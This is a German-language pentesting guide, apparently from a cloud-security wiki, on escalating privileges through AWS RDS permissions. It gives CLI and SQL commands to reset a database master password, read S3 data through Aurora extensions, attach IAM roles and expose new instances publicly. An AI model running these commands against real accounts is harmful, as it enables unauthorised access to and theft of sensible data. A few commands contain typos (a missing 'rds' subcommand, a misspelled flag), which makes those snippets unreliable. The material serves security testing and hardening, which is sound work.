AWS - RDS Privesc

RDS - Relational Database Service

Für weitere Informationen über RDS siehe:

rds:ModifyDBInstance

Mit dieser Berechtigung kann ein Angreifer das Passwort des Master-Benutzers ändern und sich in die Datenbank einloggen:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

Potentielle Auswirkung: Finden Sie sensible Informationen in den Datenbanken.

rds-db:connect

Laut den Dokumentationen könnte ein Benutzer mit dieser Berechtigung eine Verbindung zur DB-Instanz herstellen.

Missbrauch von RDS Role IAM-Berechtigungen

Postgresql (Aurora)

Zuerst können Sie überprüfen, ob diese Datenbank verwendet wurde, um auf einen anderen AWS-Dienst zuzugreifen. Sie könnten dies überprüfen, indem Sie die installierten Erweiterungen ansehen:

SELECT * FROM pg_extension;

Wenn du etwas wie aws_s3 findest, kannst du davon ausgehen, dass diese Datenbank irgendeine Art von Zugriff auf S3 hat (es gibt auch andere Erweiterungen wie aws_ml und aws_lambda).

Außerdem, wenn du die Berechtigungen hast, aws rds describe-db-clusters auszuführen, kannst du dort sehen, ob der Cluster eine IAM-Rolle angehängt hat im Feld AssociatedRoles. Falls ja, kannst du davon ausgehen, dass die Datenbank vorbereitet wurde, um auf andere AWS-Dienste zuzugreifen. Basierend auf dem Namen der Rolle (oder wenn du die Berechtigungen der Rolle erhalten kannst) könntest du vermuten, welchen zusätzlichen Zugriff die Datenbank hat.

Um nun eine Datei in einem Bucket zu lesen, musst du den vollständigen Pfad kennen. Du kannst ihn lesen mit:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

Wenn Sie rohe AWS-Anmeldeinformationen hätten, könnten Sie diese auch verwenden, um auf S3-Daten zuzugreifen mit:

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Mysql (Aurora)

Innerhalb des mysql führen Sie show variables; aus und wenn die Variablen wie aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role Werte haben, können Sie davon ausgehen, dass die Datenbank für den Zugriff auf S3-Daten vorbereitet ist.

Auch wenn Sie Berechtigungen haben, aws rds describe-db-clusters auszuführen, können Sie überprüfen, ob der Cluster eine zugeordnete Rolle hat, was normalerweise den Zugriff auf AWS-Dienste bedeutet.

Um nun eine Datei in einem Bucket zu lesen, müssen Sie den vollständigen Pfad kennen. Sie können ihn lesen mit:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

rds:AddRoleToDBCluster, iam:PassRole

Ein Angreifer mit den Berechtigungen rds:AddRoleToDBCluster und iam:PassRole kann eine bestimmte Rolle zu einer bestehenden RDS-Instanz hinzufügen. Dies könnte dem Angreifer ermöglichen, auf sensible Daten zuzugreifen oder die Daten innerhalb der Instanz zu ändern.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Potentieller Einfluss: Zugriff auf sensible Daten oder unautorisierte Änderungen an den Daten in der RDS-Instanz. Beachten Sie, dass einige DBs zusätzliche Konfigurationen erfordern, wie z.B. Mysql, das die Angabe der Rollen-ARN in den Parametergruppen benötigt.

rds:CreateDBInstance

Nur mit dieser Berechtigung könnte ein Angreifer eine neue Instanz innerhalb eines bereits existierenden Clusters erstellen, der eine IAM-Rolle angehängt hat. Er wird nicht in der Lage sein, das Master-Benutzerpasswort zu ändern, aber er könnte in der Lage sein, die neue Datenbankinstanz dem Internet auszusetzen:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

rds:CreateDBInstance, iam:PassRole

Ein Angreifer mit den Berechtigungen rds:CreateDBInstance und iam:PassRole kann eine neue RDS-Instanz mit einer angegebenen Rolle erstellen. Der Angreifer kann dann möglicherweise auf sensible Daten zugreifen oder die Daten innerhalb der Instanz ändern.

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Potenzielle Auswirkungen: Zugriff auf sensible Daten oder unbefugte Änderungen an den Daten in der RDS-Instanz.

rds:AddRoleToDBInstance, iam:PassRole

Ein Angreifer mit den Berechtigungen rds:AddRoleToDBInstance und iam:PassRole kann eine angegebene Rolle zu einer bestehenden RDS-Instanz hinzufügen. Dies könnte dem Angreifer ermöglichen, auf sensible Daten zuzugreifen oder die Daten innerhalb der Instanz zu ändern.

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Potenzielle Auswirkungen: Zugriff auf sensible Daten oder unautorisierte Änderungen an den Daten in der RDS-Instanz.